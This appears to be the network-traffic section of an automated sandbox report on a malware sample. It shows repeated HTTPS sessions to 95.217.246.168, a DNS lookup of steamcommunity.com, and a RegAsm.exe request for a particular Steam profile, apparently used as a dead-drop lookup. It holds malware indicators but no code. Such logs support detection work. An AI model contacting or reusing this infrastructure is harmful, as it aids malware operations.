Apr 24, 2024 16:49:31.462631941 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.477391958 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.477411032 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.477519989 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.477528095 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.477639914 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.508666039 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.508686066 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.508872986 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.508879900 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.508939981 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.524245024 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.524298906 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.524338007 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.524344921 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.524399042 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.524399042 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.550354004 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.550374031 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.550472021 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.550472021 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.550481081 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.550528049 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.572907925 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.572977066 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.572984934 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.573000908 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.573024035 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.573081970 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.573081970 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.573577881 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.573592901 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.705916882 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.705945015 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:31.706010103 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.706348896 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:31.706366062 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:32.359937906 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:32.360014915 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:32.360527039 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:32.360537052 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:32.360796928 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:32.360801935 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.390250921 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.390285969 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.390305996 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.390337944 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:33.390366077 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:33.390373945 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.390428066 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:33.537077904 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.537111044 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.537162066 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:33.537173033 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.537214041 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:33.537214041 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:33.766314030 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.766345024 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.766401052 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:33.766415119 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.766439915 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:33.766459942 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:33.908838987 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.908866882 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.909002066 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:33.909013033 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:33.909060001 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.023648024 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.023682117 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.023793936 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.023809910 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.023860931 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.101366043 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.101402044 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.101442099 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.101463079 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.101478100 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.101505041 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.163819075 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.163846970 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.164004087 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.164015055 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.164060116 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.225821972 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.225847960 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.225950003 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.225959063 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.225994110 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.226002932 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.292373896 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.292402029 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.292490005 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.292500019 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.292541027 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.358428001 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.358459949 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.358529091 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.358544111 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.358558893 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.358586073 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.406281948 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.406316042 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.406414032 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.406420946 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.406449080 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.406460047 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.443305016 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.443337917 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.443522930 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.443522930 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.443532944 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.443581104 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.479770899 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.479794979 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.479953051 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.479953051 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.479960918 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.480004072 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.510433912 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.510461092 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.510529041 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.510536909 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.510570049 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.510587931 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.543555021 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.543587923 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.543634892 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.543639898 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.543674946 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.543689966 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.564054966 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.564109087 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.564146996 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.564152002 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.564183950 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.564197063 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.564198017 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.564244986 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.564438105 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.564449072 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.598213911 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.598238945 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:34.598320007 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.598536968 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:34.598550081 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:35.257185936 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:35.257267952 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:35.258106947 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:35.258114100 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:35.258306026 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:35.258310080 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.291558981 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.291582108 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.291598082 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.291636944 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.291676044 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.291683912 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.291750908 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.442961931 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.443036079 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.443070889 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.443085909 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.443120003 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.443120003 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.665040016 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.665107965 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.665165901 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.665179968 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.665205956 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.665296078 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.812053919 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.812153101 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.812210083 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.812223911 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.812352896 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.926086903 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.926161051 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.926279068 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.926290035 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.926311970 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:36.926325083 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.926373005 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.926373959 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.928096056 CEST	49760	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:36.928117990 CEST	443	49760	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:37.184458971 CEST	49761	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:37.184487104 CEST	443	49761	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:37.184573889 CEST	49761	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:37.184859037 CEST	49761	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:37.184878111 CEST	443	49761	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:37.846045971 CEST	443	49761	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:37.846168041 CEST	49761	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:37.846756935 CEST	49761	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:37.846764088 CEST	443	49761	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:37.846929073 CEST	49761	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:37.846934080 CEST	443	49761	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:38.891421080 CEST	443	49761	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:38.891483068 CEST	443	49761	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:38.891624928 CEST	49761	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:38.891630888 CEST	443	49761	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:38.891694069 CEST	49761	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:38.891959906 CEST	49761	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:38.891977072 CEST	443	49761	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:38.894835949 CEST	49762	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:38.894867897 CEST	443	49762	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:38.894979000 CEST	49762	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:38.895283937 CEST	49762	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:38.895297050 CEST	443	49762	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:39.554891109 CEST	443	49762	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:39.555006981 CEST	49762	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:39.555679083 CEST	49762	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:39.555685997 CEST	443	49762	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:39.556071043 CEST	49762	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:39.556075096 CEST	443	49762	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:40.628613949 CEST	443	49762	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:40.628689051 CEST	49762	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:40.628704071 CEST	443	49762	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:40.628714085 CEST	443	49762	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:40.628763914 CEST	49762	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:40.628798962 CEST	49762	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:40.629445076 CEST	49762	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:40.629456997 CEST	443	49762	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:40.649564981 CEST	49763	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:40.649601936 CEST	443	49763	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:40.649677038 CEST	49763	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:40.649915934 CEST	49763	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:40.649935007 CEST	443	49763	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:41.307267904 CEST	443	49763	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:41.307425022 CEST	49763	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:42.687433958 CEST	49763	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:42.687472105 CEST	443	49763	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:42.687764883 CEST	49763	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:42.687772036 CEST	443	49763	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:43.700860023 CEST	443	49763	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:43.700998068 CEST	49763	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:43.701031923 CEST	443	49763	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:43.701052904 CEST	443	49763	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:43.701081038 CEST	49763	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:43.701108932 CEST	49763	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:43.709542990 CEST	49763	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:43.709556103 CEST	443	49763	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:43.774161100 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:43.774198055 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:43.774296999 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:43.774578094 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:43.774590969 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.431004047 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.431133032 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.431727886 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.431736946 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.431946993 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.431951046 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.432039976 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.432056904 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.432121992 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.432132959 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.432164907 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.432188034 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.432210922 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.432220936 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.432302952 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.432316065 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.432322025 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.432326078 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.432348967 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.432358027 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.432404995 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.432425022 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.432459116 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.432471037 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:44.432508945 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:44.432522058 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:49.875930071 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:49.875998974 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:49.876015902 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:49.876029015 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:49.876106024 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:49.876106024 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:49.876419067 CEST	49764	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:49.876430035 CEST	443	49764	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:49.881778955 CEST	49765	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:49.881807089 CEST	443	49765	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:49.881891012 CEST	49765	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:49.882134914 CEST	49765	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:49.882148981 CEST	443	49765	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:50.536926031 CEST	443	49765	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:50.536993980 CEST	49765	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:50.537664890 CEST	49765	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:50.537674904 CEST	443	49765	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:50.537873030 CEST	49765	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:50.537877083 CEST	443	49765	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:51.611140966 CEST	443	49765	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:51.611208916 CEST	443	49765	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:51.611258030 CEST	49765	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:51.611341953 CEST	49765	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:51.611833096 CEST	49765	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:51.611850977 CEST	443	49765	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:51.615503073 CEST	49766	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:51.615542889 CEST	443	49766	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:51.615721941 CEST	49766	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:51.616369963 CEST	49766	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:51.616379023 CEST	443	49766	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:52.282747984 CEST	443	49766	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:52.282893896 CEST	49766	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:52.283777952 CEST	49766	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:52.283791065 CEST	443	49766	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:52.284262896 CEST	49766	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:52.284269094 CEST	443	49766	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:53.339603901 CEST	443	49766	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:53.339677095 CEST	443	49766	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:53.339922905 CEST	49766	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:53.340370893 CEST	49766	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:53.340394020 CEST	443	49766	95.217.246.168	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 16:47:58.731461048 CEST	60017	53	192.168.2.4	1.1.1.1
Apr 24, 2024 16:47:58.884921074 CEST	53	60017	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 16:47:58.731461048 CEST	192.168.2.4	1.1.1.1	0x772e	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 16:47:58.884921074 CEST	1.1.1.1	192.168.2.4	0x772e	No error (0)	steamcommunity.com		96.17.209.196	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

95.217.246.168

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	96.17.209.196	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:47:59 UTC	119	OUT	GET /profiles/76561199677575543 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
